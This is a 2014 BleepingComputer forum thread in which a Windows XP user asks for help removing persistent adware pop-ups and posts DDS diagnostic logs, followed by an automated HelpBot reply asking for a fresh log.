Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus Immune to ComboFix, Spybot, etc, etc...please help!!


  • Please log in to reply
15 replies to this topic

#1 rockgremlin

rockgremlin

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 10 August 2014 - 09:46 PM

Ran the following programs to no avail:

 

Superantispyware

Spybot S&D

TDSKiller

Combofix

 

Nothing helps...whatever is infecting my computer just keeps getting stronger for every scan I complete. Every other click spawns three new pop-up ads or internet tabs that run advertisements for coupons or antispyware programs. TDSKiller indicated that it was a rootkit but was unsuccessful at removing it. Please help...thanks in advance!!

 

Here's my dds log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6000.17103  BrowserJavaVersion: 10.25.2
Run by Jay at 19:57:44 on 2014-08-10
Microsoft Windows XP Professional  5.1.2600.3.1252.1.1033.18.1014.549 [GMT -6:00]
.
AV: avast! Internet Security *Disabled/Outdated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Enabled*
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\005\mtgaotushb32.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Settings Manager\smdmf\smdmfu.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe
C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\WINDOWS\system32\svchost.exe -k HPService
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k netsvcs
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
uSearchMigratedDefaultURL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
mStart Page = hxxp://www.google.com
uProxyServer = hxxp=127.0.0.1
uSearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ycomp/defaults/su/*http://www.yahoo.com
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
BHO: Spybot-S&D IE Protection: {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: SaverPro: {B1C50D68-A112-A194-98C5-6E673EC9E3A8} - c:\documents and settings\all users\application data\saverpro\HeV0cV.dll
BHO: MSN Toolbar BHO: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
BHO: HP Smart BHO Class: {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: Acer eDataSecurity Management: {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - c:\windows\system32\eDStoolbar.dll
TB: MSN Toolbar: {8dcb7100-df86-4384-8842-8fa844297b3f} - c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
EB: HP Smart Web Printing: {555D4D79-4BD2-4094-A395-CFC534424A05} - c:\program files\hp\digital imaging\smart web printing\hpswp_bho.dll
uRun: [SpybotSD TeaTimer] c:\program files\spybot - search & destroy\TeaTimer.exe
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
uRun: [Spotify Web Helper] "c:\documents and settings\jay\application data\spotify\data\SpotifyWebHelper.exe"
mRun: [LaunchApp] Alaunch
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [ntiMUI] c:\program files\newtech infosystems\nti cd & dvd-maker 7\ntiMUI.exe
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [IMEKRMIG6.1] c:\windows\ime\imkr6_1\IMEKRMIG.EXE
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [eDataSecurity Loader] c:\acer\empowering technology\edatasecurity\eDSloader.exe 0
mRun: [eRecoveryService] c:\acer\empowering technology\erecovery\eRAgent.exe
mRun: [QuickCare2.2] c:\program files\qwest\quickcare\bin\sprtcmd.exe /P QuickCare2.2
mRun: [AmazonGSDownloaderTray] c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderTray.exe
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mRun: [MSN Toolbar] "c:\program files\msn toolbar\platform\4.0.0357.1\mswinext.exe"
mRun: [Microsoft Default Manager] "c:\program files\microsoft\search enhancement pack\default manager\DefMgr.exe" -resume
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [upfst_us_199.exe] c:\documents and settings\jay\local settings\application data\fst_us_199\upfst_us_199.exe -runhelper
StartupFolder: c:\docume~1\jay\startm~1\programs\startup\mypcba~1.lnk - c:\qoobox\quarantine\c\program files\mypc backup\MyPC Backup.exe.vir
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\acerwl~1.lnk - c:\program files\acer wlan 11g usb dongle\ZDWlan.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\winzip~1.lnk - c:\program files\winzip\WZQKPICK.EXE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:323
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} - hxxp://www.kaspersky.com/kos/english/kavwebscan_unicode.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 69.144.127.53 68.116.46.115 71.9.127.107
TCP: Interfaces\{CFC10892-8484-42F4-A98A-DAFA48F3A805} : DHCPNameServer = 69.144.127.53 68.116.46.115 71.9.127.107
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: igfxcui - igfxdev.dll
AppInit_DLLs= c:\docume~1\alluse~1\applic~1\browse~1\browse~1.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - c:\program files\superantispyware\SASSEH.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\jay\application data\mozilla\firefox\profiles\vthtiiie.default\
FF - prefs.js: browser.search.selectedEngine - default-search.net
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: keyword.URL - hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF - plugin: c:\documents and settings\jay\local settings\application data\robloxversions\version-759151294bb84441\NPRobloxProxy.dll
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\canon\zoombrowser ex\program\NPCIG.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: c:\program files\msn toolbar\platform\4.0.0357.1\npwinext.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1211151.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_14_0_0_145.dll
FF - plugin: c:\windows\system32\npdeployJava1.dll
FF - plugin: c:\windows\system32\npptools.dll
FF - ExtSQL: !HIDDEN! 2009-09-02 18:55; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
FF - ExtSQL: !HIDDEN! 2011-09-19 21:23; smartwebprinting@hp.com; c:\program files\hp\digital imaging\smart web printing\MozillaAddOn3
.
============= SERVICES / DRIVERS ===============
.
R0 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys [2012-3-30 21576]
R0 aswNdis;avast! Firewall NDIS Filter Service;c:\windows\system32\drivers\aswNdis.sys [2011-9-5 12112]
R0 aswNdis2;avast! Firewall Core Firewall Service;c:\windows\system32\drivers\aswNdis2.sys [2011-9-5 204784]
R0 aswRvrt;aswRvrt;c:\windows\system32\drivers\aswRvrt.sys [2013-3-21 49376]
R0 aswVmm;aswVmm;c:\windows\system32\drivers\aswVmm.sys [2013-3-21 175176]
R1 aswFW;avast! TDI Firewall driver;c:\windows\system32\drivers\aswFW.sys [2011-9-5 104752]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-9-5 770344]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2011-9-5 369584]
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622;F06DEFF2-5B9C-490D-910F-35D3A9119622;c:\program files\settings manager\smdmf\smdmfmgrc2.cfg [2014-8-10 34192]
R1 netfilter;netfilter;c:\windows\system32\drivers\netfilter.sys [2014-7-11 47488]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2011-7-22 12880]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2011-7-12 67664]
R2 !SASCORE;SAS Core Service;c:\program files\superantispyware\SASCore.exe [2011-8-11 116608]
R2 19275d4b;Browser System Enahncer;c:\windows\system32\rundll32.exe [2004-8-3 33280]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2011-9-5 29816]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2013-3-21 66336]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2011-9-5 46808]
R2 avast! Firewall;avast! Firewall;c:\program files\avast software\avast\afwServ.exe [2011-9-5 137960]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\common files\intuit\update service v4\IntuitUpdateService.exe [2012-2-6 13672]
R2 mtgaotushb32;mtgaotushb32;c:\program files\005\mtgaotushb32.exe run options=01110010050000000000000000000000 sourceguid=0f467d68-149f-43b9-a30f-62da8d197fc3 --> c:\program files\005\mtgaotushb32.exe run options=01110010050000000000000000000000 sourceguid=0F467D68-149F-43B9-A30F-62DA8D197FC3 [?]
R2 SmdmFService;SmdmF Service;c:\program files\settings manager\smdmf\SmdmFService.exe [2014-8-10 3572240]
S1 ssnfd;ssnfd;c:\windows\system32\drivers\ssnfd.sys --> c:\windows\system32\drivers\ssnfd.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 sprtlisten;SupportSoft Listener Service;c:\program files\common files\supportsoft\bin\sprtlisten.exe /identity quickassist    --> c:\program files\common files\supportsoft\bin\sprtlisten.exe  [?]
S3 06624408;06624408; [x]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S4 Amazon Download Agent;Amazon Download Agent;c:\program files\amazon\amazon games & software downloader\amazongsdownloaderservice.exe --> c:\program files\amazon\amazon games & software downloader\AmazonGSDownloaderService.exe [?]
S4 Symantec Core LC;Symantec Core LC;"c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe" --> c:\program files\common files\symantec shared\ccpd-lc\symlcsvc.exe [?]
.
=============== Created Last 30 ================
.
2014-08-11 01:57:20    --------    d-----w-    c:\documents and settings\all users\application data\ea5b54591d578367
2014-08-11 01:57:15    --------    d-----w-    c:\documents and settings\jay\AppData
2014-08-11 01:57:13    --------    d-----w-    c:\documents and settings\all users\application data\SaverPro
2014-08-11 01:46:44    --------    d-----w-    c:\documents and settings\all users\application data\Browser System Enahncer
2014-08-11 01:46:21    --------    d-----w-    c:\documents and settings\all users\application data\2308189059
2014-08-11 01:02:54    98816    ----a-w-    c:\windows\sed.exe
2014-08-11 01:02:54    256000    ----a-w-    c:\windows\PEV.exe
2014-08-11 01:02:54    208896    ----a-w-    c:\windows\MBR.exe
2014-08-11 01:02:14    --------    d-----w-    c:\program files\ToggleMark
2014-08-11 01:02:14    --------    d-----w-    c:\program files\Groovorio
2014-08-11 01:00:36    --------    d-----w-    c:\program files\0F467D68-149F-43B9-A30F-62DA8D197FC3
2014-08-11 00:59:53    --------    d-----w-    c:\documents and settings\jay\application data\VOPackage
2014-08-11 00:58:47    --------    d-----w-    c:\documents and settings\jay\local settings\application data\Linkey
2014-08-11 00:58:32    --------    d-----w-    c:\program files\Optimizer Pro
2014-08-11 00:58:16    --------    d-----w-    c:\documents and settings\jay\application data\FirefoxToolbar
2014-08-11 00:58:06    --------    d-----w-    c:\program files\Settings Manager
2014-08-11 00:57:51    --------    d-----w-    c:\documents and settings\jay\local settings\application data\fst_us_199
2014-08-11 00:57:50    --------    d-----w-    c:\program files\fst_us_199
2014-08-11 00:57:43    --------    d-----w-    c:\documents and settings\all users\application data\smdmf
2014-08-11 00:57:31    --------    d-----w-    c:\program files\005
2014-08-11 00:54:46    --------    d-----w-    c:\documents and settings\jay\local settings\application data\SearchProtect
2014-08-10 20:35:49    536576    ----a-w-    c:\windows\system32\sqlite3.dll
2014-08-10 20:32:56    --------    d-----w-    C:\AdwCleaner
2014-08-10 20:28:59    770384    ----a-w-    c:\program files\mozilla firefox\msvcr100.dll
2014-07-15 19:30:38    --------    d-----w-    c:\program files\F978377C-B7D4-4536-8E10-14CA97B13394
.
==================== Find3M  ====================
.
2014-07-11 14:13:52    47488    ----a-w-    c:\windows\system32\drivers\netfilter.sys
2014-07-09 14:01:59    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-09 14:01:59    699056    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
.
============= FINISH: 19:59:18.07 ===============
 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,600 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:24 AM

Posted 15 August 2014 - 09:50 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

step1.gif In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/543995 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

step2.gifIf you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your destop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#3 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 16 August 2014 - 12:25 AM

1. OK, so I have run a plethora of Anti-spyware/Anti-malware programs to rectify a number of problems that I believe are attributed to a virus or series of viruses. While navigating through Firefox, every other mouseclick generates a series of pop-up ads that either advertise for shopping websites, or masquerade as a software program that removes spyware, claiming that my computer is infected, and needs to be cleaned using their program. The pop-ups appear either in a new browser window, or a new tab within the browser I am currently viewing --- or both. I will proceed to close them, only to have them re-appear seconds later when I try and surf through different websites. Every click generates at least one pop-up, and sometimes up to four at once. It's incredibly obnoxious, and my internet is rendered almost unusable at this point.

 

In an effort to rectify the situation, I have run the following programs to no avail:

 

- Spybot S&D

- SuperAntiSpyware

- TDSKiller

- ADWCleaner

- Malwarebytes

- Combofix

- Kaspersky online virus scanner

 

Some of these programs I ran multiple times after running their prospective updates......and NONE of these worked! If anything, it just served to make the infection angry, generating more pop-ups with greater frequency. When I downloaded DDS, it hijacked my browser claiming that my computer was hacked, and that I needed to download and install their software program to fix the problem. TDSKiller claimed that my computer was infected by a rootkit virus, but didn't do anything beyond just notifying me about it.

 

2. My new DDS log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6000.17103  BrowserJavaVersion: 10.25.2
Run by Jay at 22:52:41 on 2014-08-15
Microsoft Windows XP Professional  5.1.2600.3.1252.1.1033.18.1014.229 [GMT -6:00]
.
AV: avast! Internet Security *Disabled/Outdated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Enabled*
.
============== Running Processes ================
.
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Documents and Settings\Jay\Local Settings\Application Data\fst_us_199\upfst_us_199.exe
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Settings Manager\smdmf\SmdmFService.exe
C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe
C:\Program Files\Settings Manager\smdmf\smdmfu.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\WINDOWS\system32\svchost.exe -k HPService
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://groovorio.com/?f=1&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
uSearchMigratedDefaultURL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
mStart Page = hxxp://www.google.com
uProxyServer = hxxp=127.0.0.1
uSearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ycomp/defaults/su/*http://www.yahoo.com
BHO: HP Print Enhancer: {0347C33E-8762-4905-BF09-768834316C61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
